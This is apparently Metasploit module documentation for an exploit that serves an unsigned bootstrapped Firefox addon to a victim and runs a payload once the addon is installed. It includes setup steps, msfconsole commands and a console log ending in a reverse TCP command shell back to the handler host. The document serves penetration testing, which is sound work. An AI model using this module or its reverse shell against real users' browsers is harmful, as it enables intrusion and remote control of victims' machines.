bcoles
2.7 KiB
Vulnerable Application
Mozilla Firefox before version 41 allowed users to install unsigned browser extensions from arbitrary web servers.
This module dynamically creates an unsigned .xpi addon file. The resulting bootstrapped Firefox addon is presented to the victim via a web page. The victim's Firefox browser will pop a dialog asking if they trust the addon.
Once the user clicks "install", the addon is installed and executes the payload with full user permissions. As of Firefox 4, this will work without a restart as the addon is marked to be "bootstrapped". As the addon will execute the payload after each Firefox restart, an option can be given to automatically uninstall the addon once the payload has been executed.
As of Firefox 41, unsigned extensions can still be installed
on Firefox Nightly, Unbranded and Development builds when
configured with xpinstall.signatures.required set to false.
Note: this module generates legacy extensions which are supported only in Firefox before version 57.
Installation
Download an old Developer Edition (version 4 < 57) installer from:
Browse to about:config and set xpinstall.signatures.required to false.
Open Tools -> Options, search for "updates" and select "Never check for updates".
Verification Steps
- Start
msfconsole - Do:
use exploit/multi/browser/firefox_xpi_bootstrapped_addon - Do:
set SRVHOST [IP] - Do:
run
Options
Scenarios
Firefox Developer Edition 56.0b9 on Windows 7 SP1 (x64) with xpinstall.signatures.required disabled
Run the module and load the web server URL in Firefox. Install the extension when prompted.
msf6 post(windows/gather/enum_domains) > use exploit/multi/browser/firefox_xpi_bootstrapped_addon
[*] No payload configured, defaulting to generic/shell_reverse_tcp
msf6 exploit(multi/browser/firefox_xpi_bootstrapped_addon) > run
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 192.168.200.130:4444
[*] Using URL: http://192.168.200.130:8080/Oj8qCs
[*] Server started.
msf6 exploit(multi/browser/firefox_xpi_bootstrapped_addon) >
[*] 192.168.200.190 firefox_xpi_bootstrapped_addon - Redirecting request.
[*] 192.168.200.190 firefox_xpi_bootstrapped_addon - Sending HTML response.
[*] 192.168.200.190 firefox_xpi_bootstrapped_addon - Sending xpi and waiting for user to click 'accept'...
[*] 192.168.200.190 firefox_xpi_bootstrapped_addon - Sending xpi and waiting for user to click 'accept'...
[*] Command shell session 1 opened (192.168.200.130:4444 -> 192.168.200.190:49861) at 2022-09-04 01:46:40 -0400